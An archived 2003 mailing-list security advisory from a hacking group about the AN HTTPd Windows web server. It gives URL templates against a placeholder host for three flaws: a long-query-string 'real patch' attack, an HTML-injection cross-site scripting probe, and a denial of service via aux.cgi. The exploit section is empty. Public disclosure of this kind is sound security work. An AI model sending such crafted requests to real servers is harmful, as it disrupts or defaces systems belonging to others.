[VulnWatch] AN HTTPd v.1.41e: DoS, CSS, real patch attack

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

  • Next message: NaSsEr .M.Sh: "[VulnWatch] A security vulnerability in S8Forum"
    Date: Sat, 4 Jan 2003 06:12:09 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: AN HTTPd server
    #Authors: [www.st.rim.or.jp]
    #Vulnerability: DoS, CSS, 'real patch' attack
    ######################################################*

    #Overview#--------------------------------------------------------------#
    This is Japanez http-server for win32-platforms. U can download it from
    www.st.rim.or.jp.

    #Problem#---------------------------------------------------------------#
    (1) real patch attack:
    http://www.vuln_host.com/[script]?aaaaaa..[1kb]...aaaaaa
    Where [script] - any cgi\batch script.
    (2) CSS:
    http://www.vuln_host.com/[script]?<h1>HACKED</h1>aaaa..[up_to_1kb]..aaaa
    (3) DoS:
    http://www.vuln_host.com/aux.cgi?aaaa..[1kb]..aaaa
    AN HTTPd will return error "broken pipe" every time,
    when somebody will execute any cgi\batch scripts on it.

    #Fix#--------------------------------------------------------------------#
    Download Apache or OmniHTTPd :)

    #Exploit#----------------------------------------------------------------#
     ------
    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981